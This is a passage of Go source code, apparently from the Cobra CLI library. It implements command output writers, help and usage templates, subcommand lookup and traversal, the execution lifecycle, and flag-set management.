// helpCommand is command with usage 'help'. If it's not defined by user,
// cobra uses default help command.
helpCommand *Command
// versionTemplate is the version template defined by user.
versionTemplate string
// inReader is a reader defined by the user that replaces stdin
inReader io.Reader
// outWriter is a writer defined by the user that replaces stdout
outWriter io.Writer
// errWriter is a writer defined by the user that replaces stderr
errWriter io.Writer
}
// Context returns underlying command context. If command wasn't
// executed with ExecuteContext Context returns Background context.
func (c *Command) Context() context.Context {
return c.ctx
}
// SetArgs sets arguments for the command. It is set to os.Args[1:] by default, if desired, can be overridden
// particularly useful when testing.
func (c *Command) SetArgs(a []string) {
c.args = a
}
// SetOutput sets the destination for usage and error messages.
// If output is nil, os.Stderr is used.
// Deprecated: Use SetOut and/or SetErr instead
func (c *Command) SetOutput(output io.Writer) {
c.outWriter = output
c.errWriter = output
}
// SetOut sets the destination for usage messages.
// If newOut is nil, os.Stdout is used.
func (c *Command) SetOut(newOut io.Writer) {
c.outWriter = newOut
}
// SetErr sets the destination for error messages.
// If newErr is nil, os.Stderr is used.
func (c *Command) SetErr(newErr io.Writer) {
c.errWriter = newErr
}
// SetIn sets the source for input data
// If newIn is nil, os.Stdin is used.
func (c *Command) SetIn(newIn io.Reader) {
c.inReader = newIn
}
// SetUsageFunc sets usage function. Usage can be defined by application.
func (c *Command) SetUsageFunc(f func(*Command) error) {
c.usageFunc = f
}
// SetUsageTemplate sets usage template. Can be defined by Application.
func (c *Command) SetUsageTemplate(s string) {
c.usageTemplate = s
}
// SetFlagErrorFunc sets a function to generate an error when flag parsing
// fails.
func (c *Command) SetFlagErrorFunc(f func(*Command, error) error) {
c.flagErrorFunc = f
}
// SetHelpFunc sets help function. Can be defined by Application.
func (c *Command) SetHelpFunc(f func(*Command, []string)) {
c.helpFunc = f
}
// SetHelpCommand sets help command.
func (c *Command) SetHelpCommand(cmd *Command) {
c.helpCommand = cmd
}
// SetHelpTemplate sets help template to be used. Application can use it to set custom template.
func (c *Command) SetHelpTemplate(s string) {
c.helpTemplate = s
}
// SetVersionTemplate sets version template to be used. Application can use it to set custom template.
func (c *Command) SetVersionTemplate(s string) {
c.versionTemplate = s
}
// SetGlobalNormalizationFunc sets a normalization function to all flag sets and also to child commands.
// The user should not have a cyclic dependency on commands.
func (c *Command) SetGlobalNormalizationFunc(n func(f *flag.FlagSet, name string) flag.NormalizedName) {
c.Flags().SetNormalizeFunc(n)
c.PersistentFlags().SetNormalizeFunc(n)
c.globNormFunc = n
for _, command := range c.commands {
command.SetGlobalNormalizationFunc(n)
}
}
// OutOrStdout returns output to stdout.
func (c *Command) OutOrStdout() io.Writer {
return c.getOut(os.Stdout)
}
// OutOrStderr returns output to stderr
func (c *Command) OutOrStderr() io.Writer {
return c.getOut(os.Stderr)
}
// ErrOrStderr returns output to stderr
func (c *Command) ErrOrStderr() io.Writer {
return c.getErr(os.Stderr)
}
// InOrStdin returns input to stdin
func (c *Command) InOrStdin() io.Reader {
return c.getIn(os.Stdin)
}
func (c *Command) getOut(def io.Writer) io.Writer {
if c.outWriter != nil {
return c.outWriter
}
if c.HasParent() {
return c.parent.getOut(def)
}
return def
}
func (c *Command) getErr(def io.Writer) io.Writer {
if c.errWriter != nil {
return c.errWriter
}
if c.HasParent() {
return c.parent.getErr(def)
}
return def
}
func (c *Command) getIn(def io.Reader) io.Reader {
if c.inReader != nil {
return c.inReader
}
if c.HasParent() {
return c.parent.getIn(def)
}
return def
}
// UsageFunc returns either the function set by SetUsageFunc for this command
// or a parent, or it returns a default usage function.
func (c *Command) UsageFunc() (f func(*Command) error) {
if c.usageFunc != nil {
return c.usageFunc
}
if c.HasParent() {
return c.Parent().UsageFunc()
}
return func(c *Command) error {
c.mergePersistentFlags()
err := tmpl(c.OutOrStderr(), c.UsageTemplate(), c)
if err != nil {
c.Println(err)
}
return err
}
}
// Usage puts out the usage for the command.
// Used when a user provides invalid input.
// Can be defined by user by overriding UsageFunc.
func (c *Command) Usage() error {
return c.UsageFunc()(c)
}
// HelpFunc returns either the function set by SetHelpFunc for this command
// or a parent, or it returns a function with default help behavior.
func (c *Command) HelpFunc() func(*Command, []string) {
if c.helpFunc != nil {
return c.helpFunc
}
if c.HasParent() {
return c.Parent().HelpFunc()
}
return func(c *Command, a []string) {
c.mergePersistentFlags()
// The help should be sent to stdout
// See https://github.com/spf13/cobra/issues/1002
err := tmpl(c.OutOrStdout(), c.HelpTemplate(), c)
if err != nil {
c.Println(err)
}
}
}
// Help puts out the help for the command.
// Used when a user calls help [command].
// Can be defined by user by overriding HelpFunc.
func (c *Command) Help() error {
c.HelpFunc()(c, []string{})
return nil
}
// UsageString returns usage string.
func (c *Command) UsageString() string {
// Storing normal writers
tmpOutput := c.outWriter
tmpErr := c.errWriter
bb := new(bytes.Buffer)
c.outWriter = bb
c.errWriter = bb
c.Usage()
// Setting things back to normal
c.outWriter = tmpOutput
c.errWriter = tmpErr
return bb.String()
}
// FlagErrorFunc returns either the function set by SetFlagErrorFunc for this
// command or a parent, or it returns a function which returns the original
// error.
func (c *Command) FlagErrorFunc() (f func(*Command, error) error) {
if c.flagErrorFunc != nil {
return c.flagErrorFunc
}
if c.HasParent() {
return c.parent.FlagErrorFunc()
}
return func(c *Command, err error) error {
return err
}
}
var minUsagePadding = 25
// UsagePadding return padding for the usage.
func (c *Command) UsagePadding() int {
if c.parent == nil || minUsagePadding > c.parent.commandsMaxUseLen {
return minUsagePadding
}
return c.parent.commandsMaxUseLen
}
var minCommandPathPadding = 11
// CommandPathPadding return padding for the command path.
func (c *Command) CommandPathPadding() int {
if c.parent == nil || minCommandPathPadding > c.parent.commandsMaxCommandPathLen {
return minCommandPathPadding
}
return c.parent.commandsMaxCommandPathLen
}
var minNamePadding = 11
// NamePadding returns padding for the name.
func (c *Command) NamePadding() int {
if c.parent == nil || minNamePadding > c.parent.commandsMaxNameLen {
return minNamePadding
}
return c.parent.commandsMaxNameLen
}
// UsageTemplate returns usage template for the command.
func (c *Command) UsageTemplate() string {
if c.usageTemplate != "" {
return c.usageTemplate
}
if c.HasParent() {
return c.parent.UsageTemplate()
}
return `Usage:{{if .Runnable}}
{{.UseLine}}{{end}}{{if .HasAvailableSubCommands}}
{{.CommandPath}} [command]{{end}}{{if gt (len .Aliases) 0}}
Aliases:
{{.NameAndAliases}}{{end}}{{if .HasExample}}
Examples:
{{.Example}}{{end}}{{if .HasAvailableSubCommands}}
Available Commands:{{range .Commands}}{{if (or .IsAvailableCommand (eq .Name "help"))}}
{{rpad .Name .NamePadding }} {{.Short}}{{end}}{{end}}{{end}}{{if .HasAvailableLocalFlags}}
Flags:
{{.LocalFlags.FlagUsages | trimTrailingWhitespaces}}{{end}}{{if .HasAvailableInheritedFlags}}
Global Flags:
{{.InheritedFlags.FlagUsages | trimTrailingWhitespaces}}{{end}}{{if .HasHelpSubCommands}}
Additional help topics:{{range .Commands}}{{if .IsAdditionalHelpTopicCommand}}
{{rpad .CommandPath .CommandPathPadding}} {{.Short}}{{end}}{{end}}{{end}}{{if .HasAvailableSubCommands}}
Use "{{.CommandPath}} [command] --help" for more information about a command.{{end}}
`
}
// HelpTemplate return help template for the command.
func (c *Command) HelpTemplate() string {
if c.helpTemplate != "" {
return c.helpTemplate
}
if c.HasParent() {
return c.parent.HelpTemplate()
}
return `{{with (or .Long .Short)}}{{. | trimTrailingWhitespaces}}
{{end}}{{if or .Runnable .HasSubCommands}}{{.UsageString}}{{end}}`
}
// VersionTemplate return version template for the command.
func (c *Command) VersionTemplate() string {
if c.versionTemplate != "" {
return c.versionTemplate
}
if c.HasParent() {
return c.parent.VersionTemplate()
}
return `{{with .Name}}{{printf "%s " .}}{{end}}{{printf "version %s" .Version}}
`
}
func hasNoOptDefVal(name string, fs *flag.FlagSet) bool {
flag := fs.Lookup(name)
if flag == nil {
return false
}
return flag.NoOptDefVal != ""
}
func shortHasNoOptDefVal(name string, fs *flag.FlagSet) bool {
if len(name) == 0 {
return false
}
flag := fs.ShorthandLookup(name[:1])
if flag == nil {
return false
}
return flag.NoOptDefVal != ""
}
func stripFlags(args []string, c *Command) []string {
if len(args) == 0 {
return args
}
c.mergePersistentFlags()
commands := []string{}
flags := c.Flags()
Loop:
for len(args) > 0 {
s := args[0]
args = args[1:]
switch {
case s == "--":
// "--" terminates the flags
break Loop
case strings.HasPrefix(s, "--") && !strings.Contains(s, "=") && !hasNoOptDefVal(s[2:], flags):
// If '--flag arg' then
// delete arg from args.
fallthrough // (do the same as below)
case strings.HasPrefix(s, "-") && !strings.Contains(s, "=") && len(s) == 2 && !shortHasNoOptDefVal(s[1:], flags):
// If '-f arg' then
// delete 'arg' from args or break the loop if len(args) <= 1.
if len(args) <= 1 {
break Loop
} else {
args = args[1:]
continue
}
case s != "" && !strings.HasPrefix(s, "-"):
commands = append(commands, s)
}
}
return commands
}
// argsMinusFirstX removes only the first x from args. Otherwise, commands that look like
// openshift admin policy add-role-to-user admin my-user, lose the admin argument (arg[4]).
func argsMinusFirstX(args []string, x string) []string {
for i, y := range args {
if x == y {
ret := []string{}
ret = append(ret, args[:i]...)
ret = append(ret, args[i+1:]...)
return ret
}
}
return args
}
func isFlagArg(arg string) bool {
return ((len(arg) >= 3 && arg[1] == '-') ||
(len(arg) >= 2 && arg[0] == '-' && arg[1] != '-'))
}
// Find the target command given the args and command tree
// Meant to be run on the highest node. Only searches down.
func (c *Command) Find(args []string) (*Command, []string, error) {
var innerfind func(*Command, []string) (*Command, []string)
innerfind = func(c *Command, innerArgs []string) (*Command, []string) {
argsWOflags := stripFlags(innerArgs, c)
if len(argsWOflags) == 0 {
return c, innerArgs
}
nextSubCmd := argsWOflags[0]
cmd := c.findNext(nextSubCmd)
if cmd != nil {
return innerfind(cmd, argsMinusFirstX(innerArgs, nextSubCmd))
}
return c, innerArgs
}
commandFound, a := innerfind(c, args)
if commandFound.Args == nil {
return commandFound, a, legacyArgs(commandFound, stripFlags(a, commandFound))
}
return commandFound, a, nil
}
func (c *Command) findSuggestions(arg string) string {
if c.DisableSuggestions {
return ""
}
if c.SuggestionsMinimumDistance <= 0 {
c.SuggestionsMinimumDistance = 2
}
suggestionsString := ""
if suggestions := c.SuggestionsFor(arg); len(suggestions) > 0 {
suggestionsString += "\n\nDid you mean this?\n"
for _, s := range suggestions {
suggestionsString += fmt.Sprintf("\t%v\n", s)
}
}
return suggestionsString
}
func (c *Command) findNext(next string) *Command {
matches := make([]*Command, 0)
for _, cmd := range c.commands {
if cmd.Name() == next || cmd.HasAlias(next) {
cmd.commandCalledAs.name = next
return cmd
}
if EnablePrefixMatching && cmd.hasNameOrAliasPrefix(next) {
matches = append(matches, cmd)
}
}
if len(matches) == 1 {
return matches[0]
}
return nil
}
// Traverse the command tree to find the command, and parse args for
// each parent.
func (c *Command) Traverse(args []string) (*Command, []string, error) {
flags := []string{}
inFlag := false
for i, arg := range args {
switch {
// A long flag with a space separated value
case strings.HasPrefix(arg, "--") && !strings.Contains(arg, "="):
// TODO: this isn't quite right, we should really check ahead for 'true' or 'false'
inFlag = !hasNoOptDefVal(arg[2:], c.Flags())
flags = append(flags, arg)
continue
// A short flag with a space separated value
case strings.HasPrefix(arg, "-") && !strings.Contains(arg, "=") && len(arg) == 2 && !shortHasNoOptDefVal(arg[1:], c.Flags()):
inFlag = true
flags = append(flags, arg)
continue
// The value for a flag
case inFlag:
inFlag = false
flags = append(flags, arg)
continue
// A flag without a value, or with an `=` separated value
case isFlagArg(arg):
flags = append(flags, arg)
continue
}
cmd := c.findNext(arg)
if cmd == nil {
return c, args, nil
}
if err := c.ParseFlags(flags); err != nil {
return nil, args, err
}
return cmd.Traverse(args[i+1:])
}
return c, args, nil
}
// SuggestionsFor provides suggestions for the typedName.
func (c *Command) SuggestionsFor(typedName string) []string {
suggestions := []string{}
for _, cmd := range c.commands {
if cmd.IsAvailableCommand() {
levenshteinDistance := ld(typedName, cmd.Name(), true)
suggestByLevenshtein := levenshteinDistance <= c.SuggestionsMinimumDistance
suggestByPrefix := strings.HasPrefix(strings.ToLower(cmd.Name()), strings.ToLower(typedName))
if suggestByLevenshtein || suggestByPrefix {
suggestions = append(suggestions, cmd.Name())
}
for _, explicitSuggestion := range cmd.SuggestFor {
if strings.EqualFold(typedName, explicitSuggestion) {
suggestions = append(suggestions, cmd.Name())
}
}
}
}
return suggestions
}
// VisitParents visits all parents of the command and invokes fn on each parent.
func (c *Command) VisitParents(fn func(*Command)) {
if c.HasParent() {
fn(c.Parent())
c.Parent().VisitParents(fn)
}
}
// Root finds root command.
func (c *Command) Root() *Command {
if c.HasParent() {
return c.Parent().Root()
}
return c
}
// ArgsLenAtDash will return the length of c.Flags().Args at the moment
// when a -- was found during args parsing.
func (c *Command) ArgsLenAtDash() int {
return c.Flags().ArgsLenAtDash()
}
func (c *Command) execute(a []string) (err error) {
if c == nil {
return fmt.Errorf("Called Execute() on a nil Command")
}
if len(c.Deprecated) > 0 {
c.Printf("Command %q is deprecated, %s\n", c.Name(), c.Deprecated)
}
// initialize help and version flag at the last point possible to allow for user
// overriding
c.InitDefaultHelpFlag()
c.InitDefaultVersionFlag()
err = c.ParseFlags(a)
if err != nil {
return c.FlagErrorFunc()(c, err)
}
// If help is called, regardless of other flags, return we want help.
// Also say we need help if the command isn't runnable.
helpVal, err := c.Flags().GetBool("help")
if err != nil {
// should be impossible to get here as we always declare a help
// flag in InitDefaultHelpFlag()
c.Println("\"help\" flag declared as non-bool. Please correct your code")
return err
}
if helpVal {
return flag.ErrHelp
}
// for back-compat, only add version flag behavior if version is defined
if c.Version != "" {
versionVal, err := c.Flags().GetBool("version")
if err != nil {
c.Println("\"version\" flag declared as non-bool. Please correct your code")
return err
}
if versionVal {
err := tmpl(c.OutOrStdout(), c.VersionTemplate(), c)
if err != nil {
c.Println(err)
}
return err
}
}
if !c.Runnable() {
return flag.ErrHelp
}
c.preRun()
argWoFlags := c.Flags().Args()
if c.DisableFlagParsing {
argWoFlags = a
}
if err := c.ValidateArgs(argWoFlags); err != nil {
return err
}
for p := c; p != nil; p = p.Parent() {
if p.PersistentPreRunE != nil {
if err := p.PersistentPreRunE(c, argWoFlags); err != nil {
return err
}
break
} else if p.PersistentPreRun != nil {
p.PersistentPreRun(c, argWoFlags)
break
}
}
if c.PreRunE != nil {
if err := c.PreRunE(c, argWoFlags); err != nil {
return err
}
} else if c.PreRun != nil {
c.PreRun(c, argWoFlags)
}
if err := c.validateRequiredFlags(); err != nil {
return err
}
if c.RunE != nil {
if err := c.RunE(c, argWoFlags); err != nil {
return err
}
} else {
c.Run(c, argWoFlags)
}
if c.PostRunE != nil {
if err := c.PostRunE(c, argWoFlags); err != nil {
return err
}
} else if c.PostRun != nil {
c.PostRun(c, argWoFlags)
}
for p := c; p != nil; p = p.Parent() {
if p.PersistentPostRunE != nil {
if err := p.PersistentPostRunE(c, argWoFlags); err != nil {
return err
}
break
} else if p.PersistentPostRun != nil {
p.PersistentPostRun(c, argWoFlags)
break
}
}
return nil
}
func (c *Command) preRun() {
for _, x := range initializers {
x()
}
}
// ExecuteContext is the same as Execute(), but sets the ctx on the command.
// Retrieve ctx by calling cmd.Context() inside your *Run lifecycle functions.
func (c *Command) ExecuteContext(ctx context.Context) error {
c.ctx = ctx
return c.Execute()
}
// Execute uses the args (os.Args[1:] by default)
// and run through the command tree finding appropriate matches
// for commands and then corresponding flags.
func (c *Command) Execute() error {
_, err := c.ExecuteC()
return err
}
// ExecuteC executes the command.
func (c *Command) ExecuteC() (cmd *Command, err error) {
if c.ctx == nil {
c.ctx = context.Background()
}
// Regardless of what command execute is called on, run on Root only
if c.HasParent() {
return c.Root().ExecuteC()
}
// windows hook
if preExecHookFn != nil {
preExecHookFn(c)
}
// initialize help as the last point possible to allow for user
// overriding
c.InitDefaultHelpCmd()
args := c.args
// Workaround FAIL with "go test -v" or "cobra.test -test.v", see #155
if c.args == nil && filepath.Base(os.Args[0]) != "cobra.test" {
args = os.Args[1:]
}
// initialize the hidden command to be used for bash completion
c.initCompleteCmd(args)
var flags []string
if c.TraverseChildren {
cmd, flags, err = c.Traverse(args)
} else {
cmd, flags, err = c.Find(args)
}
if err != nil {
// If found parse to a subcommand and then failed, talk about the subcommand
if cmd != nil {
c = cmd
}
if !c.SilenceErrors {
c.Println("Error:", err.Error())
c.Printf("Run '%v --help' for usage.\n", c.CommandPath())
}
return c, err
}
cmd.commandCalledAs.called = true
if cmd.commandCalledAs.name == "" {
cmd.commandCalledAs.name = cmd.Name()
}
// We have to pass global context to children command
// if context is present on the parent command.
if cmd.ctx == nil {
cmd.ctx = c.ctx
}
err = cmd.execute(flags)
if err != nil {
// Always show help if requested, even if SilenceErrors is in
// effect
if err == flag.ErrHelp {
cmd.HelpFunc()(cmd, args)
return cmd, nil
}
// If root command has SilentErrors flagged,
// all subcommands should respect it
if !cmd.SilenceErrors && !c.SilenceErrors {
c.Println("Error:", err.Error())
}
// If root command has SilentUsage flagged,
// all subcommands should respect it
if !cmd.SilenceUsage && !c.SilenceUsage {
c.Println(cmd.UsageString())
}
}
return cmd, err
}
func (c *Command) ValidateArgs(args []string) error {
if c.Args == nil {
return nil
}
return c.Args(c, args)
}
func (c *Command) validateRequiredFlags() error {
flags := c.Flags()
missingFlagNames := []string{}
flags.VisitAll(func(pflag *flag.Flag) {
requiredAnnotation, found := pflag.Annotations[BashCompOneRequiredFlag]
if !found {
return
}
if (requiredAnnotation[0] == "true") && !pflag.Changed {
missingFlagNames = append(missingFlagNames, pflag.Name)
}
})
if len(missingFlagNames) > 0 {
return fmt.Errorf(`required flag(s) "%s" not set`, strings.Join(missingFlagNames, `", "`))
}
return nil
}
// InitDefaultHelpFlag adds default help flag to c.
// It is called automatically by executing the c or by calling help and usage.
// If c already has help flag, it will do nothing.
func (c *Command) InitDefaultHelpFlag() {
c.mergePersistentFlags()
if c.Flags().Lookup("help") == nil {
usage := "help for "
if c.Name() == "" {
usage += "this command"
} else {
usage += c.Name()
}
c.Flags().BoolP("help", "h", false, usage)
}
}
// InitDefaultVersionFlag adds default version flag to c.
// It is called automatically by executing the c.
// If c already has a version flag, it will do nothing.
// If c.Version is empty, it will do nothing.
func (c *Command) InitDefaultVersionFlag() {
if c.Version == "" {
return
}
c.mergePersistentFlags()
if c.Flags().Lookup("version") == nil {
usage := "version for "
if c.Name() == "" {
usage += "this command"
} else {
usage += c.Name()
}
if c.Flags().ShorthandLookup("v") == nil {
c.Flags().BoolP("version", "v", false, usage)
} else {
c.Flags().Bool("version", false, usage)
}
}
}
// InitDefaultHelpCmd adds default help command to c.
// It is called automatically by executing the c or by calling help and usage.
// If c already has help command or c has no subcommands, it will do nothing.
func (c *Command) InitDefaultHelpCmd() {
if !c.HasSubCommands() {
return
}
if c.helpCommand == nil {
c.helpCommand = &Command{
Use: "help [command]",
Short: "Help about any command",
Long: `Help provides help for any command in the application.
Simply type ` + c.Name() + ` help [path to command] for full details.`,
Run: func(c *Command, args []string) {
cmd, _, e := c.Root().Find(args)
if cmd == nil || e != nil {
c.Printf("Unknown help topic %#q\n", args)
c.Root().Usage()
} else {
cmd.InitDefaultHelpFlag() // make possible 'help' flag to be shown
cmd.Help()
}
},
}
}
c.RemoveCommand(c.helpCommand)
c.AddCommand(c.helpCommand)
}
// ResetCommands delete parent, subcommand and help command from c.
func (c *Command) ResetCommands() {
c.parent = nil
c.commands = nil
c.helpCommand = nil
c.parentsPflags = nil
}
// Sorts commands by their names.
type commandSorterByName []*Command
func (c commandSorterByName) Len() int { return len(c) }
func (c commandSorterByName) Swap(i, j int) { c[i], c[j] = c[j], c[i] }
func (c commandSorterByName) Less(i, j int) bool { return c[i].Name() < c[j].Name() }
// Commands returns a sorted slice of child commands.
func (c *Command) Commands() []*Command {
// do not sort commands if it already sorted or sorting was disabled
if EnableCommandSorting && !c.commandsAreSorted {
sort.Sort(commandSorterByName(c.commands))
c.commandsAreSorted = true
}
return c.commands
}
// AddCommand adds one or more commands to this parent command.
func (c *Command) AddCommand(cmds ...*Command) {
for i, x := range cmds {
if cmds[i] == c {
panic("Command can't be a child of itself")
}
cmds[i].parent = c
// update max lengths
usageLen := len(x.Use)
if usageLen > c.commandsMaxUseLen {
c.commandsMaxUseLen = usageLen
}
commandPathLen := len(x.CommandPath())
if commandPathLen > c.commandsMaxCommandPathLen {
c.commandsMaxCommandPathLen = commandPathLen
}
nameLen := len(x.Name())
if nameLen > c.commandsMaxNameLen {
c.commandsMaxNameLen = nameLen
}
// If global normalization function exists, update all children
if c.globNormFunc != nil {
x.SetGlobalNormalizationFunc(c.globNormFunc)
}
c.commands = append(c.commands, x)
c.commandsAreSorted = false
}
}
// RemoveCommand removes one or more commands from a parent command.
func (c *Command) RemoveCommand(cmds ...*Command) {
commands := []*Command{}
main:
for _, command := range c.commands {
for _, cmd := range cmds {
if command == cmd {
command.parent = nil
continue main
}
}
commands = append(commands, command)
}
c.commands = commands
// recompute all lengths
c.commandsMaxUseLen = 0
c.commandsMaxCommandPathLen = 0
c.commandsMaxNameLen = 0
for _, command := range c.commands {
usageLen := len(command.Use)
if usageLen > c.commandsMaxUseLen {
c.commandsMaxUseLen = usageLen
}
commandPathLen := len(command.CommandPath())
if commandPathLen > c.commandsMaxCommandPathLen {
c.commandsMaxCommandPathLen = commandPathLen
}
nameLen := len(command.Name())
if nameLen > c.commandsMaxNameLen {
c.commandsMaxNameLen = nameLen
}
}
}
// Print is a convenience method to Print to the defined output, fallback to Stderr if not set.
func (c *Command) Print(i ...interface{}) {
fmt.Fprint(c.OutOrStderr(), i...)
}
// Println is a convenience method to Println to the defined output, fallback to Stderr if not set.
func (c *Command) Println(i ...interface{}) {
c.Print(fmt.Sprintln(i...))
}
// Printf is a convenience method to Printf to the defined output, fallback to Stderr if not set.
func (c *Command) Printf(format string, i ...interface{}) {
c.Print(fmt.Sprintf(format, i...))
}
// PrintErr is a convenience method to Print to the defined Err output, fallback to Stderr if not set.
func (c *Command) PrintErr(i ...interface{}) {
fmt.Fprint(c.ErrOrStderr(), i...)
}
// PrintErrln is a convenience method to Println to the defined Err output, fallback to Stderr if not set.
func (c *Command) PrintErrln(i ...interface{}) {
c.Print(fmt.Sprintln(i...))
}
// PrintErrf is a convenience method to Printf to the defined Err output, fallback to Stderr if not set.
func (c *Command) PrintErrf(format string, i ...interface{}) {
c.Print(fmt.Sprintf(format, i...))
}
// CommandPath returns the full path to this command.
func (c *Command) CommandPath() string {
if c.HasParent() {
return c.Parent().CommandPath() + " " + c.Name()
}
return c.Name()
}
// UseLine puts out the full usage for a given command (including parents).
func (c *Command) UseLine() string {
var useline string
if c.HasParent() {
useline = c.parent.CommandPath() + " " + c.Use
} else {
useline = c.Use
}
if c.DisableFlagsInUseLine {
return useline
}
if c.HasAvailableFlags() && !strings.Contains(useline, "[flags]") {
useline += " [flags]"
}
return useline
}
// DebugFlags used to determine which flags have been assigned to which commands
// and which persist.
func (c *Command) DebugFlags() {
c.Println("DebugFlags called on", c.Name())
var debugflags func(*Command)
debugflags = func(x *Command) {
if x.HasFlags() || x.HasPersistentFlags() {
c.Println(x.Name())
}
if x.HasFlags() {
x.flags.VisitAll(func(f *flag.Flag) {
if x.HasPersistentFlags() && x.persistentFlag(f.Name) != nil {
c.Println(" -"+f.Shorthand+",", "--"+f.Name, "["+f.DefValue+"]", "", f.Value, " [LP]")
} else {
c.Println(" -"+f.Shorthand+",", "--"+f.Name, "["+f.DefValue+"]", "", f.Value, " [L]")
}
})
}
if x.HasPersistentFlags() {
x.pflags.VisitAll(func(f *flag.Flag) {
if x.HasFlags() {
if x.flags.Lookup(f.Name) == nil {
c.Println(" -"+f.Shorthand+",", "--"+f.Name, "["+f.DefValue+"]", "", f.Value, " [P]")
}
} else {
c.Println(" -"+f.Shorthand+",", "--"+f.Name, "["+f.DefValue+"]", "", f.Value, " [P]")
}
})
}
c.Println(x.flagErrorBuf)
if x.HasSubCommands() {
for _, y := range x.commands {
debugflags(y)
}
}
}
debugflags(c)
}
// Name returns the command's name: the first word in the use line.
func (c *Command) Name() string {
name := c.Use
i := strings.Index(name, " ")
if i >= 0 {
name = name[:i]
}
return name
}
// HasAlias determines if a given string is an alias of the command.
func (c *Command) HasAlias(s string) bool {
for _, a := range c.Aliases {
if a == s {
return true
}
}
return false
}
// CalledAs returns the command name or alias that was used to invoke
// this command or an empty string if the command has not been called.
func (c *Command) CalledAs() string {
if c.commandCalledAs.called {
return c.commandCalledAs.name
}
return ""
}
// hasNameOrAliasPrefix returns true if the Name or any of aliases start
// with prefix
func (c *Command) hasNameOrAliasPrefix(prefix string) bool {
if strings.HasPrefix(c.Name(), prefix) {
c.commandCalledAs.name = c.Name()
return true
}
for _, alias := range c.Aliases {
if strings.HasPrefix(alias, prefix) {
c.commandCalledAs.name = alias
return true
}
}
return false
}
// NameAndAliases returns a list of the command name and all aliases
func (c *Command) NameAndAliases() string {
return strings.Join(append([]string{c.Name()}, c.Aliases...), ", ")
}
// HasExample determines if the command has example.
func (c *Command) HasExample() bool {
return len(c.Example) > 0
}
// Runnable determines if the command is itself runnable.
func (c *Command) Runnable() bool {
return c.Run != nil || c.RunE != nil
}
// HasSubCommands determines if the command has children commands.
func (c *Command) HasSubCommands() bool {
return len(c.commands) > 0
}
// IsAvailableCommand determines if a command is available as a non-help command
// (this includes all non deprecated/hidden commands).
func (c *Command) IsAvailableCommand() bool {
if len(c.Deprecated) != 0 || c.Hidden {
return false
}
if c.HasParent() && c.Parent().helpCommand == c {
return false
}
if c.Runnable() || c.HasAvailableSubCommands() {
return true
}
return false
}
// IsAdditionalHelpTopicCommand determines if a command is an additional
// help topic command; additional help topic command is determined by the
// fact that it is NOT runnable/hidden/deprecated, and has no sub commands that
// are runnable/hidden/deprecated.
// Concrete example: https://github.com/spf13/cobra/issues/393#issuecomment-282741924.
func (c *Command) IsAdditionalHelpTopicCommand() bool {
// if a command is runnable, deprecated, or hidden it is not a 'help' command
if c.Runnable() || len(c.Deprecated) != 0 || c.Hidden {
return false
}
// if any non-help sub commands are found, the command is not a 'help' command
for _, sub := range c.commands {
if !sub.IsAdditionalHelpTopicCommand() {
return false
}
}
// the command either has no sub commands, or no non-help sub commands
return true
}
// HasHelpSubCommands determines if a command has any available 'help' sub commands
// that need to be shown in the usage/help default template under 'additional help
// topics'.
func (c *Command) HasHelpSubCommands() bool {
// return true on the first found available 'help' sub command
for _, sub := range c.commands {
if sub.IsAdditionalHelpTopicCommand() {
return true
}
}
// the command either has no sub commands, or no available 'help' sub commands
return false
}
// HasAvailableSubCommands determines if a command has available sub commands that
// need to be shown in the usage/help default template under 'available commands'.
func (c *Command) HasAvailableSubCommands() bool {
// return true on the first found available (non deprecated/help/hidden)
// sub command
for _, sub := range c.commands {
if sub.IsAvailableCommand() {
return true
}
}
// the command either has no sub commands, or no available (non deprecated/help/hidden)
// sub commands
return false
}
// HasParent determines if the command is a child command.
func (c *Command) HasParent() bool {
return c.parent != nil
}
// GlobalNormalizationFunc returns the global normalization function or nil if it doesn't exist.
func (c *Command) GlobalNormalizationFunc() func(f *flag.FlagSet, name string) flag.NormalizedName {
return c.globNormFunc
}
// Flags returns the complete FlagSet that applies
// to this command (local and persistent declared here and by all parents).
func (c *Command) Flags() *flag.FlagSet {
if c.flags == nil {
c.flags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
if c.flagErrorBuf == nil {
c.flagErrorBuf = new(bytes.Buffer)
}
c.flags.SetOutput(c.flagErrorBuf)
}
return c.flags
}
// LocalNonPersistentFlags are flags specific to this command which will NOT persist to subcommands.
func (c *Command) LocalNonPersistentFlags() *flag.FlagSet {
persistentFlags := c.PersistentFlags()
out := flag.NewFlagSet(c.Name(), flag.ContinueOnError)
c.LocalFlags().VisitAll(func(f *flag.Flag) {
if persistentFlags.Lookup(f.Name) == nil {
out.AddFlag(f)
}
})
return out
}
// LocalFlags returns the local FlagSet specifically set in the current command.
func (c *Command) LocalFlags() *flag.FlagSet {
c.mergePersistentFlags()
if c.lflags == nil {
c.lflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
if c.flagErrorBuf == nil {
c.flagErrorBuf = new(bytes.Buffer)
}
c.lflags.SetOutput(c.flagErrorBuf)
}
c.lflags.SortFlags = c.Flags().SortFlags
if c.globNormFunc != nil {
c.lflags.SetNormalizeFunc(c.globNormFunc)
}
addToLocal := func(f *flag.Flag) {
if c.lflags.Lookup(f.Name) == nil && c.parentsPflags.Lookup(f.Name) == nil {
c.lflags.AddFlag(f)
}
}
c.Flags().VisitAll(addToLocal)
c.PersistentFlags().VisitAll(addToLocal)
return c.lflags
}
// InheritedFlags returns all flags which were inherited from parent commands.
func (c *Command) InheritedFlags() *flag.FlagSet {
c.mergePersistentFlags()
if c.iflags == nil {
c.iflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
if c.flagErrorBuf == nil {
c.flagErrorBuf = new(bytes.Buffer)
}
c.iflags.SetOutput(c.flagErrorBuf)
}
local := c.LocalFlags()
if c.globNormFunc != nil {
c.iflags.SetNormalizeFunc(c.globNormFunc)
}
c.parentsPflags.VisitAll(func(f *flag.Flag) {
if c.iflags.Lookup(f.Name) == nil && local.Lookup(f.Name) == nil {
c.iflags.AddFlag(f)
}
})
return c.iflags
}
// NonInheritedFlags returns all flags which were not inherited from parent commands.
func (c *Command) NonInheritedFlags() *flag.FlagSet {
return c.LocalFlags()
}
// PersistentFlags returns the persistent FlagSet specifically set in the current command.
func (c *Command) PersistentFlags() *flag.FlagSet {
if c.pflags == nil {
c.pflags = flag.NewFlagSet(c.Name(), flag.ContinueOnError)
if c.flagErrorBuf == nil {
c.flagErrorBuf = new(bytes.Buffer)
}
c.pflags.SetOutput(c.flagErrorBuf)
}
return c.pflags
}
// ResetFlags deletes all flags from command.
func (c *Command) ResetFlags() {
